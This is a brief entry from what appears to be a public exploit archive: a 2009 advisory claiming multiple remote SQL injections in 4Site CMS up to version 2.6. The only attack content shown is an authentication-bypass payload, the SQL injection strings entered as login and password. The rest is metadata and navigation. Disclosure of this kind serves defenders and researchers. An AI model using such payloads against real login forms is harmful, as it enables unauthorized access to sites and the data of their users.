[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : 4Site CMS <= 2.6 Multiple Remote SQL Injection Vulnerabilities
# Published : 2009-02-03
# Author : D.Mortalov
# Previous Title : MyDesing Sayac 2.0 (Auth Bypass) SQL Injection Vulnerability
# Next Title : Technote 7.2 Remote File Inclusion Vulnerability


[WSEC-09-002] 4Site CMS <= 2.6 Multiple Remote SQL Injections


Developer site: http://www.4site.ru/

Discovered by D.Mortalov // wsec.ru


1. Auth Bypass

Login: 1'or'1
Password: 1'ora